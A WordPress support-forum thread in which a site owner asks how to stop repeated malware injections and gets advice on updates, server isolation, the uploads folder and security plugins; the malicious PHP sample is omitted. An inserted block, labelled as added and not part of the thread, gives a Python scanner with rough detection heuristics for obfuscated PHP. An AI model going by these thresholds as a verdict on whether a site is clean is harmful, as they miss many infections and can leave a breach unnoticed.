Support » Security » Continuous Hacks

  • Hi!
    A few days ago my website was hacked, and thanks to several plugins I was able to clean it, but those plugins don't "protect", since I have to run the scan every so often to check which files contain malicious code and fix them.

    Is there a plugin I can use to prevent it? I use "Anti-Malware from GOTMLS.NET" to fix it, but they upload new files or edit some of them with code along the lines of this:
    [obfuscated PHP code omitted]

  • Moderator Jose Conti

    (@jconti)

    Hi,

    First of all, have a look at this thread:

    https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/

    You may have an uploader somewhere.

    Second, keep everything up to date; if you don't, they will get in again.

    Third, if you are sure everything is clean and up to date, talk to your hosting provider so they can look at the logs and see where the intruders got in, since it is quite possible that it is a hosting issue.

    There are monitoring plugins, but they are usually premium, such as Sucuri for example.

    Regards

    To protect yourself there are plugins such as Wordfence (which also includes a basic malware scan in its free account) and iThemes Security, for example.

    • This reply was modified 2 months, 3 weeks ago by Pablo Moratinos. Reason: spelling correction

    Yes, I followed that cleanup guide; now I need something for prevention. I have checked permissions and everything, and I contacted the hosting provider and they say everything is fine.

    Is it reliable to install several anti-malware plugins, or is it better to use just one?

    No, when it comes to security suites it is best to use just one (unless their functionality does not overlap).

    The one I use works very well for me, but it does not protect; it detects and fixes, but manually, and I no longer know what to do to prevent it. I have everything up to date.

    Moderator Jose Conti

    (@jconti)

    If you use premium plugins and/or a premium theme, are they also up to date?
    If so, there is a good chance that the accounts on the server are not isolated, which means they are hacking someone else and getting into your account from there.
    If that is the case, you will only get rid of it by changing hosting, but you have to be very sure that you have everything, absolutely everything, on the latest version, that you are not using a plugin or theme that has not been updated for a long time (say more than 1 year), that you have no file that should not be there, and that all files are clean. And never forget to check the entire uploads directory.
    If they get in, it is for one of the reasons above (apart from your own computer having a virus/worm), and you can install all the security plugins you like, they will get in anyway, since they will use your vulnerability or your neighbour's (if the hosting does not have isolated accounts).
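
    An added example, not part of the thread or of any plugin mentioned in it: one way to automate the check for files that should not be there, flagging PHP files under `wp-content/uploads` and PHP files that look like the sample in the first post (dense `\x` escapes, very long lines). The thresholds and the sample tree in `demo()` are constructed assumptions.

```python
import os
import re
import tempfile

HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{1,2}")   # "\x47"-style escapes
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def scan_tree(root, max_hex=20, max_line=2000):
    """Return {relative_path: [reasons]} for PHP files worth a manual review."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            reasons = []
            # uploads normally holds media; review any PHP found there
            if rel.startswith("wp-content/uploads/"):
                reasons.append("php-in-uploads")
            if len(HEX_ESCAPE.findall(text)) > max_hex:
                reasons.append("hex-escapes")
            if any(len(line) > max_line for line in text.splitlines()):
                reasons.append("very-long-line")
            if reasons:
                findings[rel] = reasons
    return findings


def demo():
    """Build a small constructed tree (harmless files) and scan it."""
    samples = {
        "wp-includes/version.php": "<?php $wp_version = '0.0';\n",
        "wp-content/uploads/2020/01/img.php": "<?php // constructed placeholder\n",
        "wp-content/plugins/x/cache.php": '<?php $s="' + "\\x41" * 30 + '";\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel, ", ".join(reasons))
```

    A hit is a prompt for manual review, not proof of compromise; run from cron against the real document root, it reports new or edited files without waiting for a manual scan.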

    Yes, I have everything up to date, but periodically it seems they edit files or upload new ones with malicious code.
    As for the hosting provider, that is me, since I have a VPS that I manage myself, and until now nothing had failed. I have tried uploading fresh copies of everything without keeping anything, and sometimes they get re-uploaded again.

    I really don't know what to do to prevent it.
